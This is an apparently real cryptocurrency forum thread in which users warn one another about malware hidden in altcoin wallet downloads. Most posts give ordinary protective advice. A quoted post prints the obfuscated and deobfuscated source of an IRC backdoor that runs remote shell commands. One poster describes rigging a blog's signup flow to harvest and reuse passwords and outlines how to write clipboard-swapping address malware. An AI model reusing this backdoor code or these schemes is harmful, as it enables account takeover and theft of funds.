Offline Offline

Activity: 1442



View Profile
December 17, 2015, 01:58:34 PM
 #49

Won't Norton Internet Security detect the malware if present on a certain wallet?

I have been using NIS (legally bought, not patched) for a long time. Hope it can detect them.

Also they are updating binaries every time with "Virus Definition Updates".

Can anyone confirm the facts by testing any malicious wallet on a PC with NIS previously installed?

  malware/virus detectors only foil amateur hackers(period) use sandboxie, and know that some malware can detect being opened in sandboxie... or deep freeze, but the hacker gets your coin anyway ...

 linux is the best bet, go ahead, take the plunge   Cheesy

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity  |  Sign-up @ Aurovine to get FREE HD music ... and coins!|  *TIPs*  | VNL  Vkpn45TSLR1jBa34pyrTwWDzADTEyviz4E   | TALK   CXvZkT13CNjn3ScizW1oEHWNVEAduJuKCJ   |   BTC   18wWrEfcA62D5Xmza1rRAw5cgcqwCa2YFH   |    ELP  e7rPHqbczFnUdyBk2XEdm9tj4fqjGnCqK4     Buy - Sell on          Cryptopia  |  Bleutrade   |    Poswallet     |  an experiment in trust and control - FLYcoin   |   FATiB27UfQyySJCyM1dEQTaxMdZgqxHZ4y
ipodtouchdud
Newbie
*
Offline Offline

Activity: 2


View Profile
December 21, 2015, 03:54:53 PM
 #50

I have heard of dead coins.. is this a scam/malware? I would like to know about them before investing in any type of online currency. Thanks!

 *Link Removed*
siameze
Legendary
*
Offline Offline

Activity: 1064



View Profile
January 02, 2016, 04:31:40 PM
 #51

I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.




It wasn't especially sophisticated, nor was it crypted just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.


                     ▀▀█████████▀████████████████▄
                        ████▄      ▄████████████████
                     ▄██████▀  ▄  ███████████████████
                  ▄█████████▄████▄███████████████████
                ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀████████
                                               ▀▀███▀
    ▄█▀█       ▄▀  ▄▀▀█  ▄▀   █████████████████▄ ██▀         ▄▀█
   ▄█ ▄▀      ▀█▀ █▀ █▀ ▀█▀  ███████████████████ █▀ ▀▀      ▄▀▄▀
  ▄█    ▄███  █     █   █   ████████████████████  ▄█     ▄▀▀██▀ ▄███
███▄▄▄  █▄▄▄ █▄▄ ▄▄▀   █▄▄ ██████████████████▀▀   █▄▄ ▄▄ █▄▄█▄▄▄█▄▄▄
                           ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                            ▀▀█████████████▄
                                █████████████▄
                                  █████████████▄
                                    ▀███████▀▀▀▀▀
                                      ▀████▀
                                        ▀█▀
LetItRideINNOVATIVE ▬▬▬
DICE GAME
                        ▄███████████▄
                       ██  ██████████▄
                     ▄█████████████  ██▄
            ▄▄▀█▄▄▄▄▄████████████████████▄
        ▄▄█▀   ███████████  █████  ████  █
    ▄██████ ▄▄███████████████████████████▀
 ▄▀▀ ██████████████████████████  ████  █
█  ▄███████████▀▀▀█████████████████████
██████████████    ████████▀▀██████  █▀
██████████████▄▄▄██████████   ▀▀▀▀▀▀▀
███▀ ▀██████████████████████
██    ███████████████████████
██▄▄██████████████████████████
██████████████▀   ██████████
  █████████████   ▄██████▀▀
     ▀▀██████████████▀▀
         ▀▀██████▀▀
PROVABLY
F A I R
▄█████████████▀ ▄█
██            ▄█▀
██          ▄██ ▄█
██ ▄█▄    ▄███  ██
██ ▀███▄ ▄███   ██
██  ▀███████    ██
██    █████     ██
██     ███      ██
██      ▀       ██
██              ██
▀████████████████▀
BUY  BACK
PLANS
[BTC]
BitcoinNewsMagazine
Legendary
*
Offline Offline

Activity: 994



View Profile WWW
January 02, 2016, 04:48:58 PM
 #52

Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

helloeverybody
Hero Member
*****
Offline Offline

Activity: 882


★YoBit.Net★ 350+ Coins Exchange & Dice


View Profile WWW
January 02, 2016, 04:53:23 PM
 #53

I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.




It wasn't especially sophisticated, nor was it crypted just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.

off topic slightly but You dont happen to know the name of a program i can use that will scan all my hard disk drives for wallets do you? Would be handy if it also finds dash wallets because ive got at least 1 wallet on my hdd somewhere that ive completely lost.

siameze
Legendary
*
Offline Offline

Activity: 1064



View Profile
January 02, 2016, 04:54:01 PM
 #54

Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

There are clever hacks for a trezor as well, nothing is 100% safe so don't get lulled into a false sense of security. See: http://www.hackinsight.org/news,303.html

Granted, that is a particular version of firmware but as wih any device that stores "money" there will always be people looking for the loopholes. A dedicated attacker only needs a small window of time to make your funds vanish.


                     ▀▀█████████▀████████████████▄
                        ████▄      ▄████████████████
                     ▄██████▀  ▄  ███████████████████
                  ▄█████████▄████▄███████████████████
                ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀████████
                                               ▀▀███▀
    ▄█▀█       ▄▀  ▄▀▀█  ▄▀   █████████████████▄ ██▀         ▄▀█
   ▄█ ▄▀      ▀█▀ █▀ █▀ ▀█▀  ███████████████████ █▀ ▀▀      ▄▀▄▀
  ▄█    ▄███  █     █   █   ████████████████████  ▄█     ▄▀▀██▀ ▄███
███▄▄▄  █▄▄▄ █▄▄ ▄▄▀   █▄▄ ██████████████████▀▀   █▄▄ ▄▄ █▄▄█▄▄▄█▄▄▄
                           ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                            ▀▀█████████████▄
                                █████████████▄
                                  █████████████▄
                                    ▀███████▀▀▀▀▀
                                      ▀████▀
                                        ▀█▀
LetItRideINNOVATIVE ▬▬▬
DICE GAME
                        ▄███████████▄
                       ██  ██████████▄
                     ▄█████████████  ██▄
            ▄▄▀█▄▄▄▄▄████████████████████▄
        ▄▄█▀   ███████████  █████  ████  █
    ▄██████ ▄▄███████████████████████████▀
 ▄▀▀ ██████████████████████████  ████  █
█  ▄███████████▀▀▀█████████████████████
██████████████    ████████▀▀██████  █▀
██████████████▄▄▄██████████   ▀▀▀▀▀▀▀
███▀ ▀██████████████████████
██    ███████████████████████
██▄▄██████████████████████████
██████████████▀   ██████████
  █████████████   ▄██████▀▀
     ▀▀██████████████▀▀
         ▀▀██████▀▀
PROVABLY
F A I R
▄█████████████▀ ▄█
██            ▄█▀
██          ▄██ ▄█
██ ▄█▄    ▄███  ██
██ ▀███▄ ▄███   ██
██  ▀███████    ██
██    █████     ██
██     ███      ██
██      ▀       ██
██              ██
▀████████████████▀
BUY  BACK
PLANS
[BTC]
presstab
Legendary
*
Offline Offline

Activity: 1288


Pivx Core Developer - HyperStake Founder


View Profile
January 15, 2016, 05:32:09 AM
 #55

And this is what allegedly brings down Cryptsy...

presstab's Block Explorer Service | Only $10/mo for most coins! | Richlist w/ Address Claim | Market Cap Charts | Stake Weight Tracking | PoS % Rate Tracking
PIVX - Private Instant Verified Tx | HyperStake - Fun & Easy High Reward Staking
dooglus
Legendary
*
Offline Offline

Activity: 2366



View Profile
January 15, 2016, 05:49:28 AM
 #56

And this is what allegedly brings down Cryptsy...

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

[...]

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Just-Dice                 ██             
          ██████████         
      ██████████████████     
  ██████████████████████████ 
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
    ██████████████████████   
        ██████████████       
            ██████           
   Play or Invest                 ██             
          ██████████         
      ██████████████████     
  ██████████████████████████ 
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
    ██████████████████████   
        ██████████████       
            ██████           
   1% House Edge
capcher
Full Member
***
Offline Offline

Activity: 224

This user is currently ignored.


View Profile
January 16, 2016, 12:09:17 PM
 #57

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.
jackg
Legendary
*
Offline Offline

Activity: 854

1JRmjyGo3kpdXcQeAeTBmGtgkC1AomHKED


View Profile
January 31, 2016, 01:58:26 PM
 #58

There was apparently a coin that had a malicious virus in its client software.
It was AvatarCoin and the wallet tried to duplicate the .dat wallet files onto the scammers Server so that he could take all of the coins from them wallets and sell them.

The avatarcoin scam, even included an avatar campaign of 8000AV to every user who joined the campaign and stopped paying around January 8th.

Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
January 31, 2016, 02:44:55 PM
 #59

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.

That what you see there is a red herring. Wink
https://en.wikipedia.org/wiki/Red_herring

https://bitcointalk.org/index.php?topic=1173703.msg13729914#msg13729914

Bitcoin_Delivery
Hero Member
*****
Offline Offline

Activity: 658



View Profile
February 29, 2016, 05:13:50 PM
 #60

WARNING !! This client is making outbound connections to known malware and/or phishing sites.


http://www.urlquery.net/report.php?id=1434020970582

The "Recent reports on same IP/ASN/Domain" section shows other suspicious sites/links.
https://www.virustotal.com/en/url/946ac3207509fb493eaf2e02e107b97cc03513cb373bb007a8a61b9b6b0fe61c/analysis/1434120962/

Now lets see what the debug.log has to say...
Code:
2015-06-12 12:41:10 connection timeout
2015-06-12 12:41:11 trying connection 77.249.89.46:9748 lastseen=1802.3hrs
2015-06-12 12:41:16 connection timeout
2015-06-12 12:41:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:41:22 connection timeout
2015-06-12 12:41:22 trying connection 82.238.124.41:9748 lastseen=33.6hrs
2015-06-12 12:41:27 connection timeout
2015-06-12 12:41:28 trying connection 77.85.35.151:9748 lastseen=170.7hrs
2015-06-12 12:41:33 connection timeout
2015-06-12 12:41:33 trying connection 137.135.57.119:9748 lastseen=27.6hrs
2015-06-12 12:41:38 connection timeout
2015-06-12 12:41:39 trying connection 96.54.4.190:9748 lastseen=21.7hrs
2015-06-12 12:41:44 connection timeout
2015-06-12 12:41:44 trying connection 87.154.210.76:9748 lastseen=378.8hrs
2015-06-12 12:41:49 connection timeout
2015-06-12 12:41:50 trying connection 103.230.107.12:9748 lastseen=2166.3hrs
2015-06-12 12:41:55 connection timeout
2015-06-12 12:41:55 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:00 connection timeout
2015-06-12 12:42:01 trying connection 62.157.39.12:9748 lastseen=2675.3hrs
2015-06-12 12:42:06 connection timeout
2015-06-12 12:42:06 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:11 connection timeout
2015-06-12 12:42:12 trying connection 162.255.117.105:9748 lastseen=52.5hrs
2015-06-12 12:42:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:22 connection timeout
2015-06-12 12:42:23 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:28 connection timeout
2015-06-12 12:42:28 trying connection 5.139.143.81:9748 lastseen=3461.6hrs
2015-06-12 12:42:33 connection timeout
2015-06-12 12:42:34 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:39 connection timeout
2015-06-12 12:42:39 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:44 connection timeout
2015-06-12 12:42:45 trying connection 87.154.214.25:9748 lastseen=2063.7hrs
2015-06-12 12:42:50 connection timeout
************************************************************
2015-06-12 12:42:50 trying connection 104.219.250.234:9748 lastseen=7.2hrs**
************************************************************
2015-06-12 12:42:55 connection timeout
2015-06-12 12:42:56 trying connection 80.57.229.215:9748 lastseen=115.2hrs
2015-06-12 12:43:01 connection timeout
2015-06-12 12:43:01 trying connection 77.232.5.253:9748 lastseen=1191.0hrs

Report for the address, 104.xxx.xxx.234, :
http://www.urlquery.net/report.php?id=1434121818636

And one of it's suspicious links/sites :
https://www.virustotal.com/en/url/3b1a7af045bdc8005e8243f65d203df04ba8d43f9e10fd39af1004aad75da0ed/analysis/1434122387/

Then from this screenshot lookS like Geocoin (and then all his clone) have malicious code in it...or I'm wrong?
What can we do to inspect the source of coins looking for malicious code and prevent this kind of things?

| 
 
50
| 




                       ▄
           ▄▄▄▄▄▄███████
▄▄▄▄█████  █████████████
█████████  █████████████
█████████  █████████████
█████████  █████████████
█████████  █████████████
█████████  █████████████

█████████  █████████████
█████████  █████████████
█████████  █████████████
█████████  █████████████
█████████  █████████████
▀▀▀▀█████  █████████████
           ▀▀▀▀▀▀███████
                       ▀
| 
 
$1,5 M
|


        ▄▄▄█████████▄▄▄
      ▄█████▀▀███▀▀█████▄
    ▄███▀     ███     ▀███▄
   ████       ███       ████
  ███▀                   ▀███
 ███▀                     ▀███
▄██▀       █████████       ▀██▄
███                         ███
███        █████████        ███
███                         ███
▀██▄       █████████       ▄██▀
 ███▄                     ▄███
  ███▄                   ▄███
   ████       ███       ████
    ▀███▄     ███     ▄███▀
      ▀█████▄▄███▄▄█████▀
        ▀▀▀█████████▀▀▀
 
|
 
<>
<>
<>
<>
 
GITHUB
TWITTER
YOUTUBE
FACEBOOK
cmg777
Jr. Member
*
Offline Offline

Activity: 58


View Profile
March 13, 2016, 08:09:01 PM
 #61

Interesting... This is the reason why I don't dabble too much in AltCoins that seem fishy or have a very low/unknown value.

Lionidas
Hero Member
*****
Online Online

Activity: 756


View Profile WWW
April 14, 2016, 05:17:07 AM
 #62

I have encountered this such problem in the past. I have since stopped using bitcoin core as a wallet and not had a wallet that you need to download to your computer to use it since I find it annoying to have to download the blockchain every time you log into the program. Not to mention it eats up alot of my bandwidth that I seem to be running out of when the end of the month approaches.

piranha
Jr. Member
*
Offline Offline

Activity: 52



View Profile
April 19, 2016, 11:19:03 PM
 #63

Another pretty save and easy to use program is Deep Freeze.
You can freeze your Windows partition and as soon as you reboot, your pc will go to the state you made when you "freeze" it.
This way no viruses,keyloger,trojans,rats and etc can infect you (as soon as you reboot, the bad staff is gone).
Downside is that you will have to put the block-chain of any coins you use on the second partition of your harddrive (because you will not be able to update the wallet on the windows partition).


+10 for Deep Freeze, thanks!! check out spyshelter also good protection against keyloggers, and such.  
BitcoinNewsMagazine
Legendary
*
Offline Offline

Activity: 994



View Profile WWW
April 20, 2016, 03:37:42 AM
 #64

Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

There are clever hacks for a trezor as well, nothing is 100% safe so don't get lulled into a false sense of security. See: http://www.hackinsight.org/news,303.html

Granted, that is a particular version of firmware but as wih any device that stores "money" there will always be people looking for the loopholes. A dedicated attacker only needs a small window of time to make your funds vanish.

Pretty old news. The hack that Jochen Hoenicke found for Trezor was disabled when Trezor started enforcing PINs on firmware 1.3.3. Using a Trezor with PIN and passphrase enabled is about as safe as it gets for storing your bitcoin.

There is malware that can steal bitcoin from password protected local wallets. Coinbitclip is one example and there are more.

Govagent
Newbie
*
Offline Offline

Activity: 2


View Profile
April 29, 2016, 02:33:53 PM
 #65

Good day guys, just wanna ask if there are other people in here that facing the same issue that I have encountered. I just downloaded litecoin wallet for windows from litecoin.com, yes, it's litecoin.com not litecoin.org. And after I install it on my pc, suddenly on the folder where I put the litecoin wallet installer adds 2 files, 1 is a batch file, the other is..... well.... I don't know what the heck is the other file.

So, after the installation successful, I tried to delete the installation files, which.... it can't, same ol' being used by the system warning excuse, while the installation process has finished. So I start the task manager, and found that there is one file that doesn't have an explanation of what file that is on the right panel, so.... open file location which leads to a folder named dclogs.... curious.... so I try to open it then wow.... only a few minutes and it has already written down 3 of my browsing activities (I noticed from the creation date of the files inside the dclogs folder). google it..... and I came to know that it was a some kind of a keylogger.... hmmm.... bummer but I'm quite lucky.....

My question is, does it even possible that the installation file from litecoin.com contains this keylogger? And I'm a bit hesitant to download from litecoin.org. Does this issue ever happen to someone in here? Are litecoin.com and litecoin.org are in the same team? I would be appreciate if someone could give me (a newbie) an info on this matter, and thanks  Grin .
groggin
Legendary
*
Offline Offline

Activity: 1442



View Profile
April 29, 2016, 03:34:44 PM
 #66


 never had a problem w/litecoin.org, ya gotta watch that - congrats on killing it!

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity  |  Sign-up @ Aurovine to get FREE HD music ... and coins!|  *TIPs*  | VNL  Vkpn45TSLR1jBa34pyrTwWDzADTEyviz4E   | TALK   CXvZkT13CNjn3ScizW1oEHWNVEAduJuKCJ   |   BTC   18wWrEfcA62D5Xmza1rRAw5cgcqwCa2YFH   |    ELP  e7rPHqbczFnUdyBk2XEdm9tj4fqjGnCqK4     Buy - Sell on          Cryptopia  |  Bleutrade   |    Poswallet     |  an experiment in trust and control - FLYcoin   |   FATiB27UfQyySJCyM1dEQTaxMdZgqxHZ4y
Govagent
Newbie
*
Offline Offline

Activity: 2


View Profile
April 29, 2016, 03:54:47 PM
 #67

Thanks, well that means I'm gonna use the .org installation then. Thanks 4 the info groggin.
LiberOptions
Sr. Member
****
Offline Offline

Activity: 412


View Profile
May 22, 2016, 09:10:49 PM
 #68

Yes... we should really be very attentive to malware infections. The last infection attempt I found was through an email. This email seemed to come from the Dropbox team, but it wasn't. If any of you received such an email you should delete it immediatelly.
DeathToll
Newbie
*
Offline Offline

Activity: 1


View Profile
May 28, 2016, 07:11:48 PM
 #69

A very useful warning, People should be careful while using macros. I think people usually get attracted over using specific bots or these type of macros and get scammed.
morantis
Hero Member
*****
Offline Offline

Activity: 630



View Profile
June 06, 2016, 12:08:12 AM
 #70

the simplest malware is a website

i have never done it, but known people that have and it is so simple and never catches a single eye

you download and install wordpress and set up a good strong blog, set up a free user based subscription and that is it

most computer/internet users have 1-5 email addresses and two of those are used more than the rest

most users have three main passwords and two others

passwords vary by user based on the three security password configs, any number letter combo six keys or more, must have a letter and a number and the last that adds the special character requirement

for example, depending on the website requirements a normal user may have these three main passwords

password
password123
password123$

when they sign up for your blog, they are likely using their secondary/spam catch email and one of those main passwords

when they signed up for a bank account, paypal or another main service, they used their main email and one of those passwords

a word press site that requires a special character, number and text has just about gotten all three passwords by simply working backwards, don't spam the subscribers and ask them for a second recovery email account after thirty days and you will have the primary email, probably, if not, that is a pretty easy find on the internet

no viruses, no Trojans or keyloggers, just human nature and the inability to remember too many damned passwords

i have know developers to take it one step further and modify the sign up process, the signup would keep telling the person that the email was already in use three times and get three email addresses and then the password setup script was modified to be a real pain and say no to the simple password, asking for a capital and number, then after that password, add the special character request and boom, three main passwords and three email addresses, worse case scenario, the person gets frustrated and leaves the site

too much of a pain for me and just sooooooo wrong, but one of our past IT guys did it over and over, the hardest part was actually developing a strong and good blog that made people want to sign up, with traffic at 500 plus per day, that means around 20 new signups each day, he collected them but never did anything, just as a case in point, after two years he had around 18,000 user profiles, he spot checked more than fifty and was in their paypal within three minutes, used that to see their bank accounts and in those accounts in another three minutes with about a 87% sucess rate

remember when you sign up on a new site or app, you are giving that info to whoever made(or even copied) the site and i personally have both spam emails catcher and a full set of spam passwords that i use on new sites, plus my credit cards can all produce a virtual number from their site for use on unknown websites that will disappear after one use or a given amount of money spent, you almost need to be three people, the businessman, the social magnet, and then guy who hands out info to any site that so much as looks interesting, lol
groggin
Legendary
*
Offline Offline

Activity: 1442



View Profile
June 06, 2016, 07:20:50 PM
 #71

 gr8 post dude   quoted you

ya, been using keepass for a while, a unique and complex pswd for every account is a must nowadays


pm an addy if you' like 2b tipp'd some TALK   Wink

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity  |  Sign-up @ Aurovine to get FREE HD music ... and coins!|  *TIPs*  | VNL  Vkpn45TSLR1jBa34pyrTwWDzADTEyviz4E   | TALK   CXvZkT13CNjn3ScizW1oEHWNVEAduJuKCJ   |   BTC   18wWrEfcA62D5Xmza1rRAw5cgcqwCa2YFH   |    ELP  e7rPHqbczFnUdyBk2XEdm9tj4fqjGnCqK4     Buy - Sell on          Cryptopia  |  Bleutrade   |    Poswallet     |  an experiment in trust and control - FLYcoin   |   FATiB27UfQyySJCyM1dEQTaxMdZgqxHZ4y
morantis
Hero Member
*****
Offline Offline

Activity: 630



View Profile
June 06, 2016, 08:34:58 PM
 #72

gr8 post dude   quoted you

ya, been using keepass for a while, a unique and complex pswd for every account is a must nowadays


pm an addy if you' like 2b tipp'd some TALK   Wink

services are catching up, but that means that the hacks will catch up too, i foresee with apps and security like 2fa and all the mobile wallets that a smartphone will be the only thing a person carries not too long from now, wallets in the phone, passwords in the phone, 2fa, and finally personal identification and voila, everything in the smartphone

THEN, the thieves and hackers only need to steal one thing to own you, YOUR PHONE, lol
ImHash
Hero Member
*****
Offline Offline

Activity: 574


View Profile
June 08, 2016, 08:09:32 AM
 #73

wtf are these noobs? with 0 activity just saying the same sh** over and over? lollll.
Every one should know that never use passwords for emails and other accounts on many other sites. this is just logic.
morantis
Hero Member
*****
Offline Offline

Activity: 630



View Profile
June 09, 2016, 02:18:31 AM
 #74

wtf are these noobs? with 0 activity just saying the same sh** over and over? lollll.
Every one should know that never use passwords for emails and other accounts on many other sites. this is just logic.

while what you say is more than true, it is done everyday over and over because most people are more lazy than they are smart....and that is something that every thief can count on to change from now until the end of time.    and that applies to each and every person to some degree.  anyone that disagrees would lock their car door each and every time they leave the car.  the most common excuse would be that they are not parking in a bad place or whatever, it is still an excuse and i don't lock the doors on the car that often either, but i won't make excuses, i am too damned lazy to lock/unlock the door each and every time...

but when it comes to financial security, i sure as hell dot the i's and cross the t's
Butterynoodles
Newbie
*
Offline Offline

Activity: 10


View Profile
June 13, 2016, 02:54:20 AM
 #75

Hmm this is a problem in the community if only there was an Bitcoin antivirus... :p but seriously this is a problem that needs to be fixed
morantis
Hero Member
*****
Offline Offline

Activity: 630



View Profile
June 13, 2016, 03:00:27 AM
 #76

Hmm this is a problem in the community if only there was an Bitcoin antivirus... :p but seriously this is a problem that needs to be fixed

There are several bitcoin viruses...

there are none within the chain, but there are many that sit in the pc and when you copy/paste your address, they choose from a list and copy and paste an address that looks like yours, but is really one from an hierarchal wallet belonging to someone else.  that way when you think you are sending BTC to your wallet, your are really using one of theirs....pretty easy stuff to write, the hardest part would be to search the list without delaying too much,  changing the contents of the clipboard is easy, checking to see if it is a bitcoin address could be tricky to pull off, but not really hard, simply starting with the number of characters and then if that matches checking for the absence of spaces, checking the first two characters against a list and going from there, pretty junior high school stuff
bitcoinboy12
Sr. Member
****
Offline Offline

Activity: 406

★YoBit.Net★ 350+ Coins Exchange & Dice


View Profile
June 14, 2016, 09:49:52 AM
 #77

Hmm this is a problem in the community if only there was an Bitcoin antivirus... :p but seriously this is a problem that needs to be fixed

There are several bitcoin viruses...

there are none within the chain, but there are many that sit in the pc and when you copy/paste your address, they choose from a list and copy and paste an address that looks like yours, but is really one from an hierarchal wallet belonging to someone else.  that way when you think you are sending BTC to your wallet, your are really using one of theirs....pretty easy stuff to write, the hardest part would be to search the list without delaying too much,  changing the contents of the clipboard is easy, checking to see if it is a bitcoin address could be tricky to pull off, but not really hard, simply starting with the number of characters and then if that matches checking for the absence of spaces, checking the first two characters against a list and going from there, pretty junior high school stuff

Wow that sounds simple and yet all feel really possible. Well I have to say it's not just as a "possible" hypothetical thing going on. How you said it, it's actually happening right now as we speak. Guess one thing you can do to be safe is dont go public with sites you are to show a very personal picture of you.

Perryl
Sr. Member
****
Offline Offline

Activity: 350


View Profile
July 15, 2016, 12:35:33 PM
 #78

gr8 post dude   quoted you

ya, been using keepass for a while, a unique and complex pswd for every account is a must nowadays


pm an addy if you' like 2b tipp'd some TALK   Wink

services are catching up, but that means that the hacks will catch up too, i foresee with apps and security like 2fa and all the mobile wallets that a smartphone will be the only thing a person carries not too long from now, wallets in the phone, passwords in the phone, 2fa, and finally personal identification and voila, everything in the smartphone

THEN, the thieves and hackers only need to steal one thing to own you, YOUR PHONE, lol

Or maybe call Verizon and have them change your phone to them.

kattekop
Full Member
***
Offline Offline

Activity: 192


View Profile
August 01, 2016, 07:59:11 PM
 #79

An infected coin daemon can rob a whole exchange.. It happened to Cryptsy.
https://bitcointalk.org/index.php?topic=1328521.0;all
Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
August 02, 2016, 05:06:32 AM
 #80

An infected coin daemon can rob a whole exchange.. It happened to Cryptsy.
https://bitcointalk.org/index.php?topic=1328521.0;all

Read and/or research much ?

It was an inside job. Shocked
https://bitcointalk.org/index.php?topic=1173703.0

That aside, people will someday know them as one of, if not, the main source of crypto related malware.

Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
August 02, 2016, 03:48:15 PM
 #81

Case in point.. The NAV dev didn't like this line of questioning .. Roll Eyes

Quote from: Bitcoin Forum
A reply of yours, quoted below, was deleted by the starter of a self-moderated topic. There are no rules of self-moderation, so this deletion cannot be appealed. Do not continue posting in this topic if the topic-starter has requested that you leave.

You can create a new topic if you are unsatisfied with this one. If the topic-starter is scamming, post about it in Scam Accusations.

Quote
How much of your personal information is this app accessing/sharing ?

Why does it smell phishy in here !? Roll Eyes

RoseMann
Sr. Member
****
Offline Offline

Activity: 277


View Profile
August 11, 2016, 02:56:05 AM
 #82

Thank you for this warning, (i said with 30 trojan horse viruses attacking me at the same time)

Brybtc
Newbie
*
Offline Offline

Activity: 12


View Profile
August 13, 2016, 08:11:04 PM
 #83

Speaking of antivirus can the results from AV-TEST be trusted?

Is it impartial? do they do proper testing or just surface easy stuff?

groggin
Legendary
*
Offline Offline

Activity: 1442



View Profile
September 02, 2016, 03:48:48 AM
 #84

Speaking of antivirus can the results from AV-TEST be trusted?

Is it impartial? do they do proper testing or just surface easy stuff?
 

  use www.virustotal.com to scan small files (like wallets) it uses +/- 50 AV engines to scan, it's prolly faster than using your onboard AV

                            - BUT remember, serious hackers will have no problem hiding their payload

                                                                                      

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity  |  Sign-up @ Aurovine to get FREE HD music ... and coins!|  *TIPs*  | VNL  Vkpn45TSLR1jBa34pyrTwWDzADTEyviz4E   | TALK   CXvZkT13CNjn3ScizW1oEHWNVEAduJuKCJ   |   BTC   18wWrEfcA62D5Xmza1rRAw5cgcqwCa2YFH   |    ELP  e7rPHqbczFnUdyBk2XEdm9tj4fqjGnCqK4     Buy - Sell on          Cryptopia  |  Bleutrade   |    Poswallet     |  an experiment in trust and control - FLYcoin   |   FATiB27UfQyySJCyM1dEQTaxMdZgqxHZ4y
bilebil
Newbie
*
Offline Offline

Activity: 10


View Profile WWW
September 04, 2016, 02:03:22 PM
 #85

Could you List the différent scam
Qasim1234
Sr. Member
****
Offline Offline

Activity: 260


DubaiCoin - DBIC CryptoCurrency


View Profile
September 05, 2016, 09:57:22 AM
 #86

i was infected with virus lol

shsfhs
Newbie
*
Offline Offline

Activity: 1


View Profile
September 08, 2016, 11:50:59 AM
 #87

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
